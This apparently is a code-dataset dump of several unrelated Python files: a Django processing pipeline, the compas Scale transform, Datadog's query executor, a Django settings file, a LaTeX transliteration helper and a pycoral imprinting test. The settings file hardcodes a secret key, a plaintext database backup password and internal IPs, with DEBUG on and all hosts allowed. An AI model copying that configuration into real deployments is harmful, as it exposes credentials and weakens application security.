raise NotImplementedError()
def get_input(self) -> list:
raise NotImplementedError()
class InputHandlerDB(InputHandler):
"""Read objects for re-processing from db"""
skip_pre_processing = True
per_page = 1000
def __init__(self, order_by: str='updated_date', filter_qs=None, exclude_qs=None, *args, **kwargs):
super().__init__(*args, **kwargs)
# TODO Validate order_by (must exist as model field)
self.order_by = order_by
self.filter_qs = filter_qs
self.exclude_qs = exclude_qs
if 'per_page' in kwargs and kwargs['per_page'] is not None and kwargs['per_page'] > 0:
self.per_page = kwargs['per_page']
@staticmethod
def set_parser_arguments(parser):
parser.add_argument('--order-by', type=str, default='updated_date',
help='Order items when reading from DB')
parser.add_argument('--filter', type=str,
help='Filter items with Django query language when reading from DB')
parser.add_argument('--exclude', type=str,
help='Exclude items with Django query language when reading from DB')
parser.add_argument('--per-page', type=int,
help='Number of items per page used for pagination')
def get_model(self):
raise NotImplementedError()
@staticmethod
def parse_qs_args(kwargs):
# Filter is provided as form-encoded data
kwargs_dict = dict(parse_qsl(kwargs))
for key in kwargs_dict:
val = kwargs_dict[key]
# Convert special values
if val == 'True':
val = True
elif val == 'False':
val = False
elif val.isdigit():
val = float(val)
kwargs_dict[key] = val
return kwargs_dict
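    # Illustrative example (the field names are made up, not part of the app):
    # a CLI value of --filter "published=True&year=2018" is form-encoded, so
    # parse_qs_args returns {'published': True, 'year': 2018.0} -- note that
    # purely numeric strings become floats, not ints.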
def get_queryset(self):
return self.get_model().objects.all()
def get_input(self):
res = self.get_queryset().order_by(self.order_by)
# Filter
if self.filter_qs is not None:
# Filter is provided as form-encoded data
res = res.filter(**self.parse_qs_args(self.filter_qs))
if self.exclude_qs is not None:
# Exclude is provided as form-encoded data
res = res.filter(**self.parse_qs_args(self.exclude_qs))
# Set offset
res = res[self.input_start:]
# Set limit
if self.input_limit > 0:
return res[:self.input_limit]
return res
def handle_input(self, input_content):
self.pre_processed_content.append(input_content)
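# A minimal concrete subclass only needs to supply the model to read. This is a
# hedged sketch added for illustration; the `Court` model and its import path
# are assumptions and do not ship with this module:
#
#     class CourtInputHandlerDB(InputHandlerDB):
#         def get_model(self):
#             from oldp.apps.courts.models import Court
#             return Court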
class InputHandlerFS(InputHandler):
"""Read content files for initial processing from file system"""
dir_selector = '/*'
def get_input_content_from_selector(self, selector) -> list:
content = []
if isinstance(selector, str):
if os.path.isdir(selector):
# Get all files recursive
content.extend(sorted(file for file in glob.glob(selector + self.dir_selector, recursive=True)))
elif os.path.isfile(selector):
# Selector is specific file
content.append(selector)
elif isinstance(selector, list):
# List of selectors
for s in selector:
content.extend(self.get_input_content_from_selector(s))
return content
def get_input(self) -> List[str]:
"""Select files from input_selector recursively and from directory with dir_selector """
if self.input_selector is None:
raise ProcessingError('input_selector is not set')
content_list = self.get_input_content_from_selector(self.input_selector)[self.input_start:]
if len(content_list) < 1:
raise ProcessingError('Input selector is empty: %s' % self.input_selector)
if self.input_limit > 0:
content_list = content_list[:self.input_limit]
return content_list
def handle_input(self, input_content: str) -> None:
raise NotImplementedError()
class ContentProcessor(object):
"""Base class for content processing pipeline
Methods are called in the following order:
1. get_input: returns list of input objects (fs: file path, db: model instance)
- fs: set_input: list of dirs or files
- db: set_input: db.queryset
2. handle_input: handles input objects and transforms them to processing objects (fs: file path > model instance
+ save instance, db: keep model instance); write to self.pre_processed_content
3. process: iterate over all processing steps (model instance > model instance), save processed model (in db
+ self.processed_content)
4. post_process: iterate over all post processing steps (e.g. write to ES)
"""
model = None # type: Model
working_dir = os.path.join(settings.BASE_DIR, 'workingdir')
input_handler = None # type: InputHandler
processed_content = []
pre_processed_content = []
available_processing_steps = None # type: dict
processing_steps = []
post_processing_steps = []
# Errors
pre_processing_errors = []
post_processing_errors = []
processing_errors = []
# Storage
# output_path = 'http://localhost:9200'
# DB settings (Django db models to be deleted on setup)
# db_models = []
# Stats
file_counter = 0
file_failed_counter = 0
doc_counter = 0
doc_failed_counter = 0
def __init__(self):
# Working dir
self.processing_steps = [] # type: List[BaseProcessingStep]
self.processed_content = []
self.pre_processed_content = []
self.pre_processing_errors = []
self.post_processing_errors = []
self.processing_errors = []
def set_parser_arguments(self, parser):
# Enable arguments that are used by all children
parser.add_argument('--verbose', action='store_true', default=False, help='Show debug messages')
parser.add_argument('step', nargs='*', type=str, help='Processing steps (use: "all" for all available steps)', default='all',
choices=list(self.get_available_processing_steps().keys()) + ['all'])
parser.add_argument('--limit', type=int, default=20,
help='Limits the number of items to be processed (0=unlimited)')
parser.add_argument('--start', type=int, default=0,
help='Skip the number of items before processing')
def set_options(self, options):
# Set options according to parser options
# self.output_path = options['output']
if options['verbose']:
logger.setLevel(logging.DEBUG)
def empty_content(self):
raise NotImplementedError()
def set_input_handler(self, handler: InputHandler):
self.input_handler = handler
def call_processing_steps(self, content):
"""Call each processing step one by one"""
for step in self.processing_steps: # type: BaseProcessingStep
try:
content = step.process(content)
except ProcessingError as e:
logger.error('Failed to call processing step (%s): %s' % (step, e))
self.processing_errors.append(e)
return content
def set_processing_steps(self, step_list):
"""Selects processing steps from available dict"""
# Unset old steps and load available steps
self.processing_steps = []
self.get_available_processing_steps()
        if not isinstance(step_list, list):
step_list = [step_list]
if 'all' in step_list:
return self.available_processing_steps.values()
for step in step_list:
if step in self.available_processing_steps:
self.processing_steps.append(self.available_processing_steps[step])
else:
raise ProcessingError('Requested step is not available: %s' % step)
def get_available_processing_steps(self) -> dict:
"""Loads available processing steps based on package names in settings"""
if self.available_processing_steps is None:
self.available_processing_steps = {}
# Get packages for model type
if self.model.__name__ in settings.PROCESSING_STEPS:
for step_package in settings.PROCESSING_STEPS[self.model.__name__]: # type: str
module = import_module(step_package)
if 'ProcessingStep' not in module.__dict__:
raise ProcessingError('Processing step package does not contain "ProcessingStep" class: %s' % step_package)
step_cls = module.ProcessingStep() # type: BaseProcessingStep
if not isinstance(step_cls, BaseProcessingStep):
raise ProcessingError('Processing step needs to inherit from BaseProcessingStep: %s' % step_package)
step_name = step_package.split('.')[-1] # last module name from package path
# Write to dict
self.available_processing_steps[step_name] = step_cls
else:
raise ValueError('Model `%s` is missing settings.PROCESSING_STEPS.' % self.model.__name__)
return self.available_processing_steps
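    # Assumed shape of settings.PROCESSING_STEPS (inferred from the lookup above;
    # the package paths below are illustrative, not the project's real ones):
    #
    #     PROCESSING_STEPS = {
    #         'Case': [
    #             'oldp.apps.cases.processing.processing_steps.extract_refs',
    #             'oldp.apps.cases.processing.processing_steps.assign_court',
    #         ],
    #     }
    #
    # Each listed module must expose a ProcessingStep class derived from
    # BaseProcessingStep; the step name is the last component of the module path.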
def process(self):
# Reset queues
self.pre_processed_content = []
self.processed_content = []
if self.input_handler.skip_pre_processing:
# Send input directly to content queue
self.pre_processed_content = self.input_handler.get_input()
else:
# Separate input handling and processing (processing needs to access previous items)
self.input_handler.pre_processed_content = []
for input_content in self.input_handler.get_input():
try:
self.input_handler.handle_input(input_content)
except ProcessingError as e:
logger.error('Failed to process content (%s): %s' % (input_content, e))
self.pre_processing_errors.append(e)
self.pre_processed_content = self.input_handler.pre_processed_content
logger.debug('Pre-processed content: %i' % len(self.pre_processed_content))
# Start actual processing
self.process_content()
# Call post processing steps (each with whole content queue)
for step in self.post_processing_steps:
try:
step.process(self.processed_content)
except ProcessingError as e:
logger.error('Failed to call post processing step (%s): %s' % (step, e))
self.post_processing_errors.append(e)
def process_content(self):
        raise NotImplementedError("Child classes need to implement this method.")
def log_stats(self):
logger.info('Processing stats:')
logger.info('- Successful files: %i (failed: %i)' % (self.file_counter, self.file_failed_counter))
logger.info('- Successful documents: %i (failed: %i)' % (self.doc_counter, self.doc_failed_counter))
for step in self.post_processing_steps:
if hasattr(step, 'log_stats'):
step.log_stats()
if len(self.pre_processing_errors) > 0:
logger.warning('Pre-processing errors: %i' % len(self.pre_processing_errors))
logger.debug('Pre-processing errors: %s' % self.pre_processing_errors)
if len(self.processing_errors) > 0:
logger.warning('Processing errors: %i' % len(self.processing_errors))
logger.debug('Processing errors: %s' % self.processing_errors)
if len(self.post_processing_errors) > 0:
logger.warning('Post-processing errors: %i' % len(self.post_processing_errors))
logger.debug('Post-processing errors: %s' % self.post_processing_errors)
| 37.25072
| 133
| 0.637397
|
6634df436895202bf7adc234f984525b4a52f919
| 3,427
|
py
|
Python
|
src/compas/geometry/transformations/scale.py
|
funkchaser/compas
|
b58de8771484aa0c6068d43df78b1679503215de
|
[
"MIT"
] | 235
|
2017-11-07T07:33:22.000Z
|
2022-03-25T16:20:00.000Z
|
src/compas/geometry/transformations/scale.py
|
funkchaser/compas
|
b58de8771484aa0c6068d43df78b1679503215de
|
[
"MIT"
] | 770
|
2017-09-22T13:42:06.000Z
|
2022-03-31T21:26:45.000Z
|
src/compas/geometry/transformations/scale.py
|
funkchaser/compas
|
b58de8771484aa0c6068d43df78b1679503215de
|
[
"MIT"
] | 99
|
2017-11-06T23:15:28.000Z
|
2022-03-25T16:05:36.000Z
|
"""
This library of transformations is partly derived from, and re-implemented based on, the
following online resources:
* http://www.lfd.uci.edu/~gohlke/code/transformations.py.html
* http://www.euclideanspace.com/maths/geometry/rotations/
* http://code.activestate.com/recipes/578108-determinant-of-matrix-of-any-order/
* http://blog.acipo.com/matrix-inversion-in-javascript/
Many thanks to Christoph Gohlke, Martin John Baker, Sachin Joglekar and Andrew
Ippoliti for providing code and documentation.
"""
from compas.utilities import flatten
from compas.geometry import allclose
from compas.geometry import multiply_matrices
from compas.geometry.transformations import decompose_matrix
from compas.geometry.transformations import matrix_from_scale_factors
from compas.geometry.transformations import matrix_from_frame
from compas.geometry.transformations import matrix_inverse
from compas.geometry.transformations import Transformation
class Scale(Transformation):
"""Creates a scale transformation.
Parameters
----------
matrix : 4x4 matrix-like, optional
A 4x4 matrix (or similar) representing a scaling.
Raises
------
ValueError
If the default constructor is used,
and the provided transformation matrix is not a scale matrix.
Examples
--------
>>> S = Scale.from_factors([1, 2, 3])
>>> S[0, 0] == 1
True
>>> S[1, 1] == 2
True
>>> S[2, 2] == 3
True
>>> from compas.geometry import Point, Frame
>>> point = Point(2, 5, 0)
>>> frame = Frame(point, (1, 0, 0), (0, 1, 0))
>>> points = [point, Point(2, 10, 0)]
>>> S = Scale.from_factors([2.] * 3, frame)
>>> [p.transformed(S) for p in points]
[Point(2.000, 5.000, 0.000), Point(2.000, 15.000, 0.000)]
"""
def __init__(self, matrix=None):
if matrix:
scale, _, _, _, _ = decompose_matrix(matrix)
check = matrix_from_scale_factors(scale)
if not allclose(flatten(matrix), flatten(check)):
raise ValueError('This is not a proper scale matrix.')
super(Scale, self).__init__(matrix=matrix)
def __repr__(self):
return "Scale({0!r})".format(self.matrix)
@classmethod
def from_factors(cls, factors, frame=None):
"""Construct a scale transformation from scale factors.
Parameters
----------
factors : list of float
The scale factors along X, Y, Z.
frame : :class:`compas.geometry.Frame`, optional
The anchor frame for the scaling transformation.
Defaults to ``None``.
Returns
-------
Scale
A scale transformation.
Examples
--------
>>> from compas.geometry import Point, Frame
>>> point = Point(2, 5, 0)
>>> frame = Frame(point, (1, 0, 0), (0, 1, 0))
>>> points = [point, Point(2, 10, 0)]
>>> S = Scale.from_factors([2.] * 3, frame)
>>> [p.transformed(S) for p in points]
[Point(2.000, 5.000, 0.000), Point(2.000, 15.000, 0.000)]
"""
S = cls()
if frame:
Tw = matrix_from_frame(frame)
Tl = matrix_inverse(Tw)
Sc = matrix_from_scale_factors(factors)
S.matrix = multiply_matrices(multiply_matrices(Tw, Sc), Tl)
else:
S.matrix = matrix_from_scale_factors(factors)
return S
| 33.271845
| 84
| 0.618325
|
4381df39395ce49072d0f6451d7e48751d8baac7
| 10,201
|
py
|
Python
|
datadog_checks_base/datadog_checks/base/utils/db/core.py
|
OuesFa/integrations-core
|
0ffe4ca306580a2e775b515152384034c2dfdc03
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_base/datadog_checks/base/utils/db/core.py
|
OuesFa/integrations-core
|
0ffe4ca306580a2e775b515152384034c2dfdc03
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_base/datadog_checks/base/utils/db/core.py
|
OuesFa/integrations-core
|
0ffe4ca306580a2e775b515152384034c2dfdc03
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2019-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import logging
from itertools import chain
from typing import Any, Callable, Dict, List, Tuple
from datadog_checks.base import AgentCheck
from datadog_checks.base.utils.db.types import QueriesExecutor, QueriesSubmitter, Transformer
from ...config import is_affirmative
from ..containers import iter_unique
from .query import Query
from .transform import COLUMN_TRANSFORMERS, EXTRA_TRANSFORMERS
from .utils import SUBMISSION_METHODS, create_submission_transformer
class QueryExecutor(object):
"""
QueryExecutor is a lower-level implementation of QueryManager which supports multiple instances
per AgentCheck. It is used to execute queries via the `executor` parameter and submit resulting
telemetry via the `submitter` parameter.
"""
def __init__(
self,
executor, # type: QueriesExecutor
submitter, # type: QueriesSubmitter
queries=None, # type: List[Dict[str, Any]]
tags=None, # type: List[str]
error_handler=None, # type: Callable[[str], str]
hostname=None, # type: str
logger=None,
): # type: (...) -> QueryExecutor
self.executor = executor # type: QueriesExecutor
self.submitter = submitter # type: QueriesSubmitter
for submission_method in SUBMISSION_METHODS.keys():
if not hasattr(self.submitter, submission_method):
raise ValueError(
'QueryExecutor submitter is missing required submission method `{}`'.format(submission_method)
)
self.tags = tags or []
self.error_handler = error_handler
self.queries = [Query(payload) for payload in queries or []] # type: List[Query]
self.hostname = hostname # type: str
self.logger = logger or logging.getLogger(__name__)
def compile_queries(self):
"""This method compiles every `Query` object."""
column_transformers = COLUMN_TRANSFORMERS.copy() # type: Dict[str, Transformer]
for submission_method, transformer_name in SUBMISSION_METHODS.items():
method = getattr(self.submitter, submission_method)
# Save each method in the initializer -> callable format
column_transformers[transformer_name] = create_submission_transformer(method)
for query in self.queries:
query.compile(column_transformers, EXTRA_TRANSFORMERS.copy())
def execute(self, extra_tags=None):
"""This method executes all of the compiled queries."""
global_tags = list(self.tags)
if extra_tags:
global_tags.extend(list(extra_tags))
for query in self.queries:
query_name = query.name
query_columns = query.column_transformers
extra_transformers = query.extra_transformers
query_tags = query.base_tags
try:
rows = self.execute_query(query.query)
except Exception as e:
if self.error_handler:
self.logger.error('Error querying %s: %s', query_name, self.error_handler(str(e)))
else:
self.logger.error('Error querying %s: %s', query_name, e)
continue
for row in rows:
if not self._is_row_valid(query, row):
continue
# It holds the query results
sources = {} # type: Dict[str, str]
# It holds the transformers defined in query_columns along with the column value
submission_queue = [] # type: List[Tuple[Transformer, Any]]
tags = global_tags + query_tags
for (column_name, type_transformer), column_value in zip(query_columns, row):
# Columns can be ignored via configuration
if not column_name:
continue
sources[column_name] = column_value
column_type, transformer = type_transformer
# The transformer can be None for `source` types. Those such columns do not submit
# anything but are collected into the row values for other columns to reference.
if transformer is None:
continue
elif column_type == 'tag':
tags.append(transformer(None, column_value)) # get_tag transformer
elif column_type == 'tag_list':
tags.extend(transformer(None, column_value)) # get_tag_list transformer
else:
submission_queue.append((transformer, column_value))
for transformer, value in submission_queue:
transformer(sources, value, tags=tags, hostname=self.hostname)
for name, transformer in extra_transformers:
try:
result = transformer(sources, tags=tags, hostname=self.hostname)
except Exception as e:
self.logger.error('Error transforming %s: %s', name, e)
continue
else:
if result is not None:
sources[name] = result
def _is_row_valid(self, query, row):
# type: (Query, List) -> bool
if not row:
self.logger.debug('Query %s returned an empty result', query.name)
return False
num_columns = len(query.column_transformers)
if num_columns != len(row):
self.logger.error(
'Query %s expected %d column%s, got %d',
query.name,
num_columns,
's' if num_columns > 1 else '',
len(row),
)
return False
return True
def execute_query(self, query):
"""
Called by `execute`, this triggers query execution to check for errors immediately in a way that is compatible
with any library. If there are no errors, this is guaranteed to return an iterator over the result set.
"""
rows = self.executor(query)
if rows is None:
return iter([])
else:
rows = iter(rows)
# Ensure we trigger query execution
try:
first_row = next(rows)
except StopIteration:
return iter([])
return chain((first_row,), rows)
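# Illustrative query payload accepted by QueryExecutor/QueryManager (a hedged
# sketch based on the Query/column handling above; the names and SQL are made up):
#
#     EXAMPLE_QUERY = {
#         'name': 'example.rows',
#         'query': 'SELECT env, row_count FROM some_table',
#         'columns': [
#             {'name': 'env', 'type': 'tag'},
#             {'name': 'example.row_count', 'type': 'gauge'},
#         ],
#         'tags': ['source:example'],
#     }
#
# Columns typed 'tag'/'tag_list' become tags, 'source' columns are only kept for
# other transformers to reference, and metric-typed columns are submitted via the
# check's submission methods.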
class QueryManager(QueryExecutor):
"""
This class is in charge of running any number of `Query` instances for a single Check instance.
You will most often see it created during Check initialization like this:
```python
self._query_manager = QueryManager(
self,
self.execute_query,
queries=[
queries.SomeQuery1,
queries.SomeQuery2,
queries.SomeQuery3,
queries.SomeQuery4,
queries.SomeQuery5,
],
tags=self.instance.get('tags', []),
error_handler=self._error_sanitizer,
)
self.check_initializations.append(self._query_manager.compile_queries)
```
Note: This class is not in charge of opening or closing connections, just running queries.
"""
def __init__(
self,
check, # type: AgentCheck
executor, # type: QueriesExecutor
queries=None, # type: List[Dict[str, Any]]
tags=None, # type: List[str]
error_handler=None, # type: Callable[[str], str]
hostname=None, # type: str
): # type: (...) -> QueryManager
"""
- **check** (_AgentCheck_) - an instance of a Check
- **executor** (_callable_) - a callable accepting a `str` query as its sole argument and returning
a sequence representing either the full result set or an iterator over the result set
- **queries** (_List[Dict]_) - a list of queries in dict format
- **tags** (_List[str]_) - a list of tags to associate with every submission
- **error_handler** (_callable_) - a callable accepting a `str` error as its sole argument and returning
a sanitized string, useful for scrubbing potentially sensitive information libraries emit
"""
super(QueryManager, self).__init__(
executor=executor,
submitter=check,
queries=queries,
tags=tags,
error_handler=error_handler,
hostname=hostname,
logger=check.log,
)
self.check = check # type: AgentCheck
only_custom_queries = is_affirmative(self.check.instance.get('only_custom_queries', False)) # type: bool
custom_queries = list(self.check.instance.get('custom_queries', [])) # type: List[str]
use_global_custom_queries = self.check.instance.get('use_global_custom_queries', True) # type: str
# Handle overrides
if use_global_custom_queries == 'extend':
custom_queries.extend(self.check.init_config.get('global_custom_queries', []))
elif (
not custom_queries
and 'global_custom_queries' in self.check.init_config
and is_affirmative(use_global_custom_queries)
):
custom_queries = self.check.init_config.get('global_custom_queries', [])
# Override statement queries if only running custom queries
if only_custom_queries:
self.queries = []
# Deduplicate
for i, custom_query in enumerate(iter_unique(custom_queries), 1):
query = Query(custom_query)
query.query_data.setdefault('name', 'custom query #{}'.format(i))
self.queries.append(query)
if len(self.queries) == 0:
self.logger.warning('QueryManager initialized with no query')
def execute(self, extra_tags=None):
# This needs to stay here b/c when we construct a QueryManager in a check's __init__
# there is no check ID at that point
self.logger = self.check.log
return super(QueryManager, self).execute(extra_tags)
| 40.480159
| 118
| 0.606901
|
1da7ff2c0066124e27700befb1c1944bacae8df5
| 5,621
|
py
|
Python
|
autoops/settings.py
|
jiajipan/autoops
|
edd728cf5c40675828d8e135370b5a3f0d070d24
|
[
"Apache-2.0"
] | 2
|
2019-09-12T07:14:26.000Z
|
2020-05-26T15:07:53.000Z
|
autoops/settings.py
|
jiajipan/autoops
|
edd728cf5c40675828d8e135370b5a3f0d070d24
|
[
"Apache-2.0"
] | null | null | null |
autoops/settings.py
|
jiajipan/autoops
|
edd728cf5c40675828d8e135370b5a3f0d070d24
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Django settings for autoops project.
Generated by 'django-admin startproject' using Django 1.11.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'mo2+&!_l_7z0ty4%e75a#gdf%*&es4p6n$y90xk=18uao*&8*y'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*', ]
# Application definition
INSTALLED_APPS = [
'bootstrap3',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'asset',
'db',
'names',
'tasks',
'library',
'rest_framework',
'rest_framework.authtoken',
'djcelery',
'guardian',
'DjangoUeditor',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend', # default
'guardian.backends.ObjectPermissionBackend',
)
ANONYMOUS_USER_ID = -1
ROOT_URLCONF = 'autoops.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'autoops.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.mysql',
# 'NAME': 'autoops',
# 'USER': 'root',
# 'PASSWORD': '123456',
# 'HOST': '192.168.10.29',
# 'PORT': '3306',
# }
# }
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Custom User Auth model
# AUTH_USER_MODEL = 'names.User'
SESSION_ENGINE = 'django.contrib.sessions.backends.db'
LOGIN_URL = '/login.html'
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'zh-Hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = False  # Note: must be False so that the date/time formats below take effect
USE_TZ = False  # For an internal-only system this is best left False, otherwise time zone issues appear
DATETIME_FORMAT = 'Y-m-d H:i:s'  # Works around a small suit/admin datetime bug: the format has to be set explicitly
DATE_FORMAT = 'Y-m-d'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
import djcelery
djcelery.setup_loader()
BROKER_URL = 'redis://127.0.0.1:6379/0'
CELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TIMEZONE = 'Asia/Shanghai'
CELERY_IMPORTS = ('tasks.task',)
CELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAdminUser',)
}
MEDIA_ROOT = os.path.join(BASE_DIR, 'upload/')
MEDIA_URL = '/upload/'  # URL prefix used by the browser to access uploaded files
Inception_ip = '192.168.10.99'  # Address of the Inception service; must be configured
Inception_port = '6669'  # Port of the Inception service
Webssh_ip = '42.62.55.58'  # Access IP of the WebSSH service
Webssh_port='9000'
inception_remote_system_password='654321'  # Rollback/backup server parameters; keep in sync with the settings in script/inc.cnf
inception_remote_system_user='root'
inception_remote_backup_port='3306'
inception_remote_backup_host='192.168.10.100'
| 26.144186
| 92
| 0.667675
|
ccede5afa7c0446284976cb5d43cb77793a8f876
| 1,888
|
py
|
Python
|
flatlatex/transliteration.py
|
jb-leger/flatlatex
|
744afe3b6afa5b3b1996aad14d184af3a0590dfb
|
[
"BSD-2-Clause"
] | 4
|
2021-12-01T23:25:37.000Z
|
2021-12-12T09:30:33.000Z
|
flatlatex/transliteration.py
|
jb-leger/flatlatex
|
744afe3b6afa5b3b1996aad14d184af3a0590dfb
|
[
"BSD-2-Clause"
] | null | null | null |
flatlatex/transliteration.py
|
jb-leger/flatlatex
|
744afe3b6afa5b3b1996aad14d184af3a0590dfb
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2016, Jean-Benoist Leger <jb@leger.tf>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from . import latexfuntypes
def transliterate(alphabet):
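    # Return a function that maps each character of a string through `alphabet` and reports whether every character was translated.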
alphabet_keys = alphabet.keys()
def fun(flat_input):
flat_output = ""
success = True
for c in flat_input:
if c in alphabet_keys:
flat_output += alphabet[c]
else:
flat_output += c
success = False
return (flat_output, success)
return fun
def transliterator(alphabet):
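    # Wrap transliterate() as a single-argument latexfun.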
return latexfuntypes.latexfun(lambda x: transliterate(alphabet)(x[0])[0], 1)
| 40.170213
| 80
| 0.728814
|
9fe893242b4360fe80f3aa8e7ae202024b5402db
| 6,034
|
py
|
Python
|
tests/imprinting_evaluation_test.py
|
notaJiminLee/pycoral
|
d04eabadb69b57899c429d808633969444985ff2
|
[
"Apache-2.0"
] | 1
|
2021-04-30T19:49:01.000Z
|
2021-04-30T19:49:01.000Z
|
tests/imprinting_evaluation_test.py
|
notaJiminLee/pycoral
|
d04eabadb69b57899c429d808633969444985ff2
|
[
"Apache-2.0"
] | null | null | null |
tests/imprinting_evaluation_test.py
|
notaJiminLee/pycoral
|
d04eabadb69b57899c429d808633969444985ff2
|
[
"Apache-2.0"
] | 1
|
2021-06-03T21:24:40.000Z
|
2021-06-03T21:24:40.000Z
|
# Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluates the accuracy of imprinting based transfer learning model."""
import contextlib
import os
from PIL import Image
from pycoral.adapters import classify
from pycoral.adapters import common
from pycoral.learn.imprinting.engine import ImprintingEngine
from pycoral.utils.edgetpu import make_interpreter
from tests import test_utils
import unittest
@contextlib.contextmanager
def test_image(path):
with open(path, 'rb') as f:
with Image.open(f) as image:
yield image
class ImprintingEngineEvaluationTest(unittest.TestCase):
def _transfer_learn_and_evaluate(self, model_path, keep_classes, dataset_path,
test_ratio, top_k_range):
"""Transfer-learns with given params and returns the evaluation result.
Args:
model_path: string, path of the base model.
keep_classes: bool, whether to keep base model classes.
dataset_path: string, path to the directory of dataset. The images should
be put under sub-directory named by category.
test_ratio: float, the ratio of images used for test.
top_k_range: int, top_k range to be evaluated. The function will return
accuracy from top 1 to top k.
Returns:
list of float numbers.
"""
engine = ImprintingEngine(model_path, keep_classes)
extractor = make_interpreter(engine.serialize_extractor_model())
extractor.allocate_tensors()
num_classes = engine.num_classes
print('--------------- Parsing dataset ----------------')
print('Dataset path:', dataset_path)
# train in fixed order to ensure the same evaluation result.
train_set, test_set = test_utils.prepare_data_set_from_directory(
dataset_path, test_ratio, True)
print('Image list successfully parsed! Number of Categories = ',
len(train_set))
print('--------------- Processing training data ----------------')
print('This process may take more than 30 seconds.')
train_input = []
labels_map = {}
for class_id, (category, image_list) in enumerate(train_set.items()):
print('Processing {} ({} images)'.format(category, len(image_list)))
train_input.append(
[os.path.join(dataset_path, category, image) for image in image_list])
labels_map[num_classes + class_id] = category
